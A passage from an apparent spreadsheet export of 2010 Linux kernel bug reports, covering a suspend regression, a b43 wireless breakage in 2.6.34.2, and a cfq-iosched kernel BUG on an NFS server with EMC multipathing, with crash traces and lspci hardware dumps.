Devices [AMD] K8 [Athlon64/Opteron] HyperTransport Technology Configuration Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Capabilities: [80] HyperTransport: Host or Secondary Interface Command: WarmRst+ DblEnd- DevNum=0 ChainSide- HostHide+ Slave- &lt;EOCErr- DUL- Link Control: CFlE- CST- CFE- &lt;LkFail- Init+ EOC- TXO- &lt;CRCErr=8 IsocEn- LSEn+ ExtCTL- 64b+ Link Config: MLWI=16bit DwFcIn- MLWO=16bit DwFcOut- LWI=16bit DwFcInEn- LWO=16bit DwFcOutEn- Revision ID: 1.02 Link Frequency: 800MHz Link Error: &lt;Prot- &lt;Ovfl- &lt;EOC- CTLTm- Link Frequency Capability: 200MHz+ 300MHz- 400MHz+ 500MHz- 600MHz+ 800MHz+ 1.0GHz- 1.2GHz- 1.4GHz- 1.6GHz- Vend- Feature Capability: IsocFC- LDTSTOP+ CRCTM- ECTLT- 64bA- UIDRD- ExtRS- UCnfE- 00:18.1 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Address Map Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- 00:18.2 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] DRAM Controller Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- 00:18.3 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Miscellaneous Control Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Capabilities: [f0] Secure device &lt;?&gt; Kernel driver in use: k8temp Kernel modules: k8temp 01:05.0 VGA compatible controller: ATI Technologies Inc RS780M/RS780MN [Radeon HD 3200 Graphics] (prog-if 00 [VGA controller]) Subsystem: Acer Incorporated [ALI] Device 028d Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 18 Region 0: Memory at e0000000 (32-bit, prefetchable) [size=256M] Region 1: I/O ports at 7000 [size=256] Region 2: Memory at f2200000 (32-bit, non-prefetchable) [size=64K] Region 5: Memory at f2100000 (32-bit, non-prefetchable) [size=1M] Expansion ROM at &lt;unassigned&gt; [disabled] Capabilities: [50] Power Management version 3 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [a0] MSI: Enable- Count=1/1 Maskable- 64bit+ Address: 0000000000000000 Data: 0000 Kernel driver in use: radeon 02:00.0 Network controller: Atheros Communications Inc. AR9285 Wireless Network Adapter (PCI-Express) (rev 01) Subsystem: Foxconn International, Inc. Device e016 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 16 Region 0: Memory at f1100000 (64-bit, non-prefetchable) [size=64K] Capabilities: [40] Power Management version 3 Flags: PMEClk- DSI- D1+ D2- AuxCurrent=375mA PME(D0+,D1+,D2-,D3hot+,D3cold-) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [50] MSI: Enable- Count=1/1 Maskable- 64bit- Address: 00000000 Data: 0000 Capabilities: [60] Express (v2) Legacy Endpoint, MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;512ns, L1 &lt;64us ExtTag- AttnBtn- AttnInd- PwrInd- RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd+ ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 512 bytes DevSta: CorrErr+ UncorrErr- FatalErr- UnsuppReq+ AuxPwr- TransPend- LnkCap: Port #0, Speed 2.5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;512ns, L1 &lt;64us ClockPM- Surprise- LLActRep- BwNot- LnkCtl: ASPM L1 Enabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- DevCap2: Completion Timeout: Not Supported, TimeoutDis+ DevCtl2: Completion Timeout: 50us to 50ms, TimeoutDis- LnkCtl2: Target Link Speed: 2.5GT/s, EnterCompliance- SpeedDis-, Selectable De-emphasis: -6dB Transmit Margin: Normal Operating Range, EnterModifiedCompliance- ComplianceSOS- Compliance De-emphasis: -6dB LnkSta2: Current De-emphasis Level: -6dB Capabilities: [100] Advanced Error Reporting UESta: DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP- ECRC- UnsupReq- ACSViol- UEMsk: DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP- ECRC- UnsupReq- ACSViol- UESvrt: DLP+ SDES+ TLP- FCP+ CmpltTO- CmpltAbrt- UnxCmplt- RxOF+ MalfTLP+ ECRC- UnsupReq- ACSViol- CESta: RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr+ CEMsk: RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr+ AERCap: First Error Pointer: 00, GenCap+ CGenEn- ChkCap+ ChkEn- Capabilities: [140] Virtual Channel &lt;?&gt; Capabilities: [160] Device Serial Number 00-15-17-ff-ff-24-14-12 Capabilities: [170] Power Budgeting &lt;?&gt; Kernel driver in use: ath9k Kernel modules: ath9k 08:00.0 Ethernet controller: Attansic Technology Corp. Atheros AR8132 / L1c Gigabit Ethernet Adapter (rev c0) Subsystem: Acer Incorporated [ALI] Device 028d Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 17 Region 0: Memory at f1000000 (64-bit, non-prefetchable) [size=256K] Region 2: I/O ports at 2000 [size=128] Capabilities: [40] Power Management version 3 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 NoSoftRst+ PME-Enable- DSel=0 DScale=0 PME- Capabilities: [48] MSI: Enable- Count=1/1 Maskable- 64bit+ Address: 0000000000000000 Data: 0000 Capabilities: [58] Express (v1) Endpoint, MSI 00 DevCap: MaxPayload 4096 bytes, PhantFunc 0, Latency L0s &lt;4us, L1 unlimited ExtTag- AttnBtn+ AttnInd+ PwrInd+ RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 512 bytes DevSta: CorrErr- UncorrErr+ FatalErr- UnsuppReq+ AuxPwr+ TransPend- LnkCap: Port #0, Speed 2.5GT/s, Width x1, ASPM L0s L1, Latency L0 unlimited, L1 unlimited ClockPM+ Surprise- LLActRep- BwNot- LnkCtl: ASPM L1 Enabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- Capabilities: [6c] Vital Product Data Not readable Capabilities: [100] Advanced Error Reporting UESta: DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP- ECRC- UnsupReq+ ACSViol- UEMsk: DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP- ECRC- UnsupReq- ACSViol- UESvrt: DLP- SDES+ TLP- FCP- CmpltTO- CmpltAbrt- UnxCmplt- RxOF+ MalfTLP+ ECRC- UnsupReq- ACSViol- CESta: RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr- CEMsk: RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr+ AERCap: First Error Pointer: 14, GenCap+ CGenEn- ChkCap+ ChkEn- Capabilities: [180] Device Serial Number ff-2b-d5-2d-00-26-22-ff Kernel driver in use: atl1c Kernel modules: atl1c 9. /proc/scsi/scsi Attached devices: Host: scsi0 Channel: 00 Id: 00 Lun: 00 Vendor: ATA Model: TOSHIBA MK1655GS Rev: FG01 Type: Direct-Access ANSI SCSI revision: 05 Host: scsi2 Channel: 00 Id: 00 Lun: 00 Vendor: Optiarc Model: DVD RW AD-7585H Rev: KX04 Type: CD-ROM ANSI SCSI revision: 05</t>
  </si>
  <si>
    <t>2.6.35 suspend regression (bisected)</t>
  </si>
  <si>
    <t>2010-08-03 19:19 UTC</t>
  </si>
  <si>
    <t>2010-08-24 20:07 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.35 suspend regression (bisected) Submitter : Roberto Oppedisano &lt;roberto.oppedisano@infracom.it&gt; Date : 2010-07-25 20:27 Message-ID : 4C4C9E40.7070209@infracom.it References : http://marc.info/?l=linux-kernel&amp;m=128009001003625&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.34.2 breaks b43</t>
  </si>
  <si>
    <t>2.6.34.2</t>
  </si>
  <si>
    <t>2010-08-03 23:53 UTC</t>
  </si>
  <si>
    <t>archman</t>
  </si>
  <si>
    <t>2010-08-30 17:41 UTC</t>
  </si>
  <si>
    <t>After upgrading to ARCH 2.6.34.2-1 it is no longer possible to use the broadcom wireless cards BCM4311, BCM4312, BCM4318 and possibly some others (also refering to the official kernel log: http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.34.2 Line: "ssb: Handle Netbook devices where the SPROM address is changed. For some Netbook computers with Broadcom BCM4312 wireless interfaces,the SPROM has been moved to a new location. When the ssb driver tries to read the old location, the systems hangs when trying to read a non-existent location. Such freezes are particularly bad as they do not log the failure." When trying to ifconfig wlan0 up, I get: "SCIOCSIFFLAGS: Cannot assign requested address' while trying 'ifconfig wlan0 up". Downgrading to 2.6.34.1-1 solves the problem, though. 08:00.0 Network controller: Broadcom Corporation BCM4311 802.11b/g WLAN (rev 01) Further info and discussion here, please: https://bbs.archlinux.org/viewtopic.php?id=102212</t>
  </si>
  <si>
    <t>excessive number of warnings during compilation</t>
  </si>
  <si>
    <t>2.6.35.0</t>
  </si>
  <si>
    <t>2010-08-04 01:06 UTC</t>
  </si>
  <si>
    <t>software+linux-kernel</t>
  </si>
  <si>
    <t>2010-09-14 06:07 UTC</t>
  </si>
  <si>
    <t>2.6.32: BUGs in cfq-iosched.c:2329 with EMC multipathing</t>
  </si>
  <si>
    <t>2010-08-04 01:16 UTC</t>
  </si>
  <si>
    <t>I reported this in February to LKML against 2.6.32.3 without much reaction, see http://lkml.org/lkml/2010/2/2/208 It also happened with the latest Debian Sid kernel (based on 2.6.32.16), so reporting it here, too. Now it didn't happen during system bootup, but after an uptime of several days. The message, as received by our log server: Jul 27 16:42:48 nfs.niif.hu kernel: [412579.212737] device-mapper: multipath: Failing path 8:160. Jul 27 16:42:49 nfs.niif.hu kernel: [412579.247872] device-mapper: multipath: Failing path 8:240. Jul 27 16:42:50 nfs.niif.hu kernel: [412579.297906] ------------[ cut here ]------------ Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] kernel BUG at /build/buildd-linux-2.6_2.6.32-17-i3 6-4N4Tq6/linux-2.6-2.6.32/debian/build/source_i386_none/block/cf\ q-iosched.c:2329! Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] invalid opcode: 0000 [#1] SMP Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] last sysfs file: /sys/devices/virtual/block/dm-3/r movable Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] Modules linked in: ip_vs_wlc ip_vs nfsd nfs lockd scache nfs_acl auth_rpcgss sunrpc ip6t_REJECT ip6t_LOG nf_conntr\ ack_ipv6 ip6table_filter ip6_tables xt recent ipt_REJECT nf_conntrack_ipv4 nf_defrag_ipv4 xt_state nf_conntrack xt_tcpudp ipt_LOG xt_limit xt multiport iptable_filter \ ip_tables x_tables ext2 mbcache ipmi_devintf ipmi_si ipmi_msghandler radeon t m snd_pcm snd_timer drm_kms_helper snd soundcore snd_page_alloc drm i2c_algo_bit pcspkr i\ 2c_i801 evdev i2c_core i6300esb rng_core button shpchp processor pci_hotplug e752x_edac edac_core xfs exportfs dm_ro nd_robin scsi_dh_emc dm_multipath dm_mod scsi_dh 8\ 021q garp stp bonding sd_mod crc_t10dif uhci_hcd ehc _hcd ata_generic mptspi ata_piix mptscsih mptbase thermal qla2xxx scsi_transport_spi libata scsi_trans ort_fc ther\ mal_sys scsi_tgt tg3 usbcore libphy nls_base scsi_mod [last unloaded: scsi_wait_scan] Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] Pid: 447, comm: kmpath_handlerd Not tainted (2.6.3 -5-686 #1) IBM BladeCenter HS20 -[884321Y]- Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] EIP: 0060:[&lt;c1131e28&gt;] EFLAGS: 00010046 CPU: 0 Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] EIP is at cfq_put_request+0x1c/0x4a Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] EAX: 00000000 EBX: f0b6e708 ECX: c1131e0c EDX: 000 000d Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] ESI: f6498540 EDI: f67c0000 EBP: 00000001 ESP: f64 3ed4 Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068 Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] Process kmpath_handlerd (pid: 447, ti=f6452000 tas =f6603300 task.ti=f6452000) Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] Stack: Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] f0b6e708 01282c4f c1121419 c1127f18 f67c0000 f0b6 708 00000292 c11283d3 Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] &lt;0&gt; f659fd0c f83332eb 00000000 f8332491 f659fc10 f 677800 f6677800 f0b6e708 Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] &lt;0&gt; c126b3ee f6600000 00000000 f659fc00 f6677800 f 59fc0c f8332761 f66034bc Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] Call Trace: Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] [&lt;c1121419&gt;] ? elv_put_request+0x10/0x11 Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] [&lt;c1127f18&gt;] ? __blk_put_request+0x60/0x8e Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] [&lt;c11283d3&gt;] ? blk_put_request+0x1e/0x2e send_trespass_cmd+0x21c/0x226 [scs _dh_emc] Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] [&lt;c126b3ee&gt;] ? schedule+0x78f/0x7dc Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] [&lt;f8332761&gt;] ? clariion_activate+0x3b/0xeb [scsi_ h_emc] Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] [&lt;f82c95f1&gt;] ? scsi_dh_activate+0x6d/0x82 [scsi_d ] Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] [&lt;f8304b8c&gt;] ? activate_path+0x1d/0x118 [dm_multi ath] Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] [&lt;c1040aa7&gt;] ? worker_thread+0x141/0x1bd Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] [&lt;f8304b6f&gt;] ? activate_path+0x0/0x118 [dm_multip th] Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] [&lt;c10437de&gt;] ? autoremove_wake_function+0x0/0x2d Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] [&lt;c1040966&gt;] ? worker_thread+0x0/0x1bd Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] [&lt;c10435ac&gt;] ? kthread+0x61/0x66 Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] [&lt;c104354b&gt;] ? kthread+0x0/0x66 Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] [&lt;c1003d47&gt;] ? kernel_thread_helper+0x7/0x10 Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] Code: e1 4b c1 89 da 5b 5e e9 0b bb f7 ff 5b 5e c3 56 53 8b 70 5c 89 c3 85 f6 74 3c 8b 40 24 83 e0 01 8d 50 0c 8b 4\ 4 96 0c 85 c0 75 04 &lt;0f&gt; 0b eb fe 48 8 44 96 0c 8b 43 58 8b 40 10 e8 32 8f ff ff 89 Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] EIP: [&lt;c1131e28&gt;] cfq_put_request+0x1c/0x4a SS:ESP 0068:f6453ed4 Jul 27 16:42:50 nfs.niif.hu kernel: [412579.301846] ---[ end trace aca77b10ce27a5b7 ]--- Jul 27 16:42:52 nfs.niif.hu kernel: [412583.065023] bonding: bond0: link status definitely down for in erface eth0, disabling it Jul 27 16:42:52 nfs.niif.hu kernel: [412583.113962] bonding: bond0: making interface eth1 the new acti e one. After this, the machine froze. A couple of minutes before the freeze some MySQL dumps were done, but on rather small databases, so those didn't put serious load on the system. We didn't manage to reproduce the issue yet, although it's much similar to the previous one reported to LKML, which happens frequently. The referenced code is below: /* * queue lock held here */ static void cfq_put_request(struct request *rq) { struct cfq_queue *cfqq = RQ_CFQQ(rq); if (cfqq) { const int rw = rq_data_dir(rq); BUG_ON(!cfqq-&gt;allocated[rw]); cfqq-&gt;allocated[rw]--; put_io_context(RQ_CIC(rq)-&gt;ioc); rq-&gt;elevator_private = NULL; rq-&gt;elevator_private2 = NULL; cfq_put_queue(cfqq); } } I don't know why the paths 8:160 and 8:240 were failed, the FC fabric probably remained intact during the crash, but multipathd logged this: Jul 27 16:42:48 nfs.niif.hu multipathd: sdk: emc_clariion_checker: Active path to inactive snapshot WWN 60060160f4512000de9d9b74090cdf11. Jul 27 16:42:48 nfs.niif.hu multipathd: checker failed path 8:160 in map 360060160f4512000de9d9b74090cdf11 Jul 27 16:42:48 nfs.niif.hu multipathd: 360060160f4512000de9d9b74090cdf11: remaining active paths: 3 Jul 27 16:42:48 nfs.niif.hu multipathd: sdp: emc_clariion_checker: Active path to inactive snapshot WWN 60060160f4512000de9d9b74090cdf11. Jul 27 16:42:48 nfs.niif.hu multipathd: checker failed path 8:240 in map 360060160f4512000de9d9b74090cdf11 Jul 27 16:42:49 nfs.niif.hu multipathd: 360060160f4512000de9d9b74090cdf11: remaining active paths: 2 Jul 27 16:42:49 nfs.niif.hu multipathd: dm-3: add map (uevent) Jul 27 16:42:49 nfs.niif.hu multipathd: dm-3: devmap already registered The bonding logs are puzzling, but the route logs also show the changes: For eth0, the primary interface: Jul 27 16:49:11.501 MET-DST: %LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/1, changed state to down Jul 27 16:49:14.933 MET-DST: %LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/1, changed state to up Jul 27 16:49:18.513 MET-DST: %LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/1, changed state to down Jul 27 16:49:21.937 MET-DST: %LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/1, changed state to up And for eth1, the backup interface: Jul 27 16:49:18.653 MET-DST: %LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/1, changed state to down Jul 27 16:49:21.901 MET-DST: %LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/1, changed state to up This definitely looks linked to the BUG in some way. The multipath configuration is something like this, with unstable SCSI disk names: nfs (360060160ec612000f6f237e09406df11) dm-0 DGC,RAID 5 size=5.0G features='1 queue_if_no_path' hwhandler='1 emc' wp=rw |-+- policy='round-robin 0' prio=2 status=active | |- 0:0:1:0 sdg 8:96 active ready running | `- 1:0:1:0 sdj 8:144 active ready running `-+- policy='round-robin 0' prio=0 status=enabled |- 0:0:0:0 sda 8:0 active ready running `- 1:0:0:0 sdd 8:48 active ready running SIBM-ESXSST936701LC F3LC065GL00007604NMST dm-3 IBM-ESXS,ST936701LC FN size=34G features='0' hwhandler='0' wp=rw `-+- policy='round-robin 0' prio=1 status=active `- 2:0:0:0 sdm 8:192 active ready running pws_www (360060160ec612000b2582fa24863df11) dm-1 DGC,RAID 5 size=140G features='1 queue_if_no_path' hwhandler='1 emc' wp=rw |-+- policy='round-robin 0' prio=2 status=active | |- 0:0:0:1 sdb 8:16 active ready running | `- 1:0:0:1 sde 8:64 active ready running `-+- policy='round-robin 0' prio=0 status=enabled |- 0:0:1:1 sdh 8:112 active ready running `- 1:0:1:1 sdk 8:160 active ready running pws_sql (360060160ec61200046717d0cf763df11) dm-2 DGC,RAID 5 size=30G features='1 queue_if_no_path' hwhandler='1 emc' wp=rw |-+- policy='round-robin 0' prio=2 status=active | |- 0:0:0:2 sdc 8:32 active ready running | `- 1:0:0:2 sdf 8:80 active ready running `-+- policy='round-robin 0' prio=0 status=enabled |- 0:0:1:2 sdi 8:128 active ready running `- 1:0:1:2 sdl 8:176 active ready running Path 8:240 does not exist now, but the same system can also run on another blade, which sees the same LUN as 0:0:1:3 from the storage. I hope you get an idea how to tackle this. An unstable NFS server isn't particularly fun. :( Thanks, Feri. ** Kernel log: boot messages should be attached The error messages generated by udev running on the inactive paths overflow the kernel log buffer before rsyslogd starts, so they aren't really available: Jul 27 18:43:19 nfs kernel: imklog 4.6.3, log source = /proc/kmsg started. Jul 27 18:43:19 nfs kernel: 7] 00 Jul 27 18:43:19 nfs kernel: [ 167.111502] sd 1:0:1:1: [sdk] Device not ready Jul 27 18:43:19 nfs kernel: [ 167.111505] sd 1:0:1:1: [sdk] Result: hostbyte=DID_OK driverbyte=DRIVER_SENSE Jul 27 18:43:19 nfs kernel: [ 167.111508] sd 1:0:1:1: [sdk] Sense Key : Not Ready [current] Jul 27 18:43:19 nfs kernel: [ 167.111512] sd 1:0:1:1: [sdk] Add. Sense: Logical unit not ready, manual intervention required Jul 27 18:43:19 nfs kernel: [ 167.111517] sd 1:0:1:1: [sdk] CDB: Read(10): 28 00 00 00 00 00 00 00 08 00 Jul 27 18:43:19 nfs kernel: [ 167.111524] end_request: I/O error, dev sdk, sector 0 If you need something specific, please ask for it. My original LKML report also contains some serial-over-LAN logs which may be interesting. ** Model information not available ** PCI devices: 00:00.0 Host bridge [0600]: Intel Corporation E7520 Memory Controller Hub [8086:3590] (rev 0c) Subsystem: IBM eServer xSeries server mainboard [1014:02dd] Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr+ Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Region 1: Memory at ff000000 (32-bit, non-prefetchable) [size=4K] Capabilities: &lt;access denied&gt; Kernel driver in use: e752x_edac Kernel modules: e752x_edac 00:00.1 Class [ff00]: Intel Corporation E7525/E7520 Error Reporting Registers [8086:3591] (rev 0c) Subsystem: IBM eServer xSeries server mainboard [1014:02dd] Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- 00:03.0 PCI bridge [0604]: Intel Corporation E7525/E7520/E7320 PCI Express Port A1 [8086:3596] (rev 0c) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr+ Stepping- SERR+ FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=04, subordinate=06, sec-latency=0 I/O behind bridge: 00005000-0000ffff Memory behind bridge: d9000000-dcffffff Prefetchable memory behind bridge: 00000000c0000000-00000000c00fffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity+ SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: &lt;access denied&gt; Kernel driver in use: pcieport Kernel modules: shpchp 00:08.0 System peripheral [0880]: Intel Corporation E7525/E7520/E7320 Extended Configuration Registers [8086:359b] (rev 0c) Subsystem: IBM eServer xSeries server mainboard [1014:02dd] Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- 00:1c.0 PCI bridge [0604]: Intel Corporation 6300ESB 64-bit PCI-X Bridge [8086:25ae] (rev 02) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr+ Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64, Cache Line Size: 64 bytes Bus: primary=00, secondary=02, subordinate=02, sec-latency=64 I/O behind bridge: 00004000-00004fff Memory behind bridge: dd000000-deffffff Prefetchable memory behind bridge: 00000000c0100000-00000000c01fffff Secondary status: 66MHz+ FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity+ SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: &lt;access denied&gt; Kernel modules: shpchp 00:1d.0 USB Controller [0c03]: Intel Corporation 6300ESB USB Universal Host Controller [8086:25a9] (rev 02) (prog-if 00 [UHCI]) 00:1d.0 USB Controller [0c03]: Intel Corporation 6300ESB USB Universal Host Controller [8086:25a9] (rev 02) (prog-if 00 [UHCI]) Subsystem: IBM Device [1014:02dd] Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 16 Region 4: I/O ports at 2200 [size=32] Kernel driver in use: uhci_hcd Kernel modules: uhci-hcd 00:1d.1 USB Controller [0c03]: Intel Corporation 6300ESB USB Universal Host Controller [8086:25aa] (rev 02) (prog-if 00 [UHCI]) Subsystem: IBM Device [1014:02dd] Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin B routed to IRQ 19 Region 4: I/O ports at 2600 [size=32] Kernel driver in use: uhci_hcd Kernel modules: uhci-hcd 00:1d.4 System peripheral [0880]: Intel Corporation 6300ESB Watchdog Timer [8086:25ab] (rev 02) Subsystem: IBM Device [1014:02dd] Control: I/O- Mem+ BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Region 0: Memory at c0200400 (32-bit, non-prefetchable) [size=16] Kernel modules: i6300esb 00:1d.5 PIC [0800]: 